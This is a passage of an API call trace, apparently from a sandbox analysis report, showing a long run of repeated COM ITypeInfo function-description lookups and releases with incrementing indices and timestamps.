(This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x80, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x81, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x82, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x83, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x84, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x85, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x86, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x87, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x88, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x89, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x90, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x91, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x92, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x93, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.196] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x94, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.196] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x95, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x96, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x97, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x98, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x99, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa0, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa1, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa2, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa3, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa4, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa5, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa6, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa7, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.197] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.197] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa8, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa9, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaa, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xab, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xac, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xad, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xae, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaf, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb0, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb1, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb2, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb3, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb4, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb5, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb6, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb7, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb8, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb9, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xba, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbb, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.198] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.198] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbc, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbd, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbe, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbf, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc0, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc1, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc2, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc3, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc4, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc5, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc6, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc7, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc8, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc9, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xca, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcb, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcc, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcd, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xce, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.199] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcf, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.199] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd0, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd1, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd2, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd3, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd4, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd5, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd6, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd7, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd8, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd9, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xda, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.200] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.200] ITypeInfo:RemoteGetFuncDesc (in: 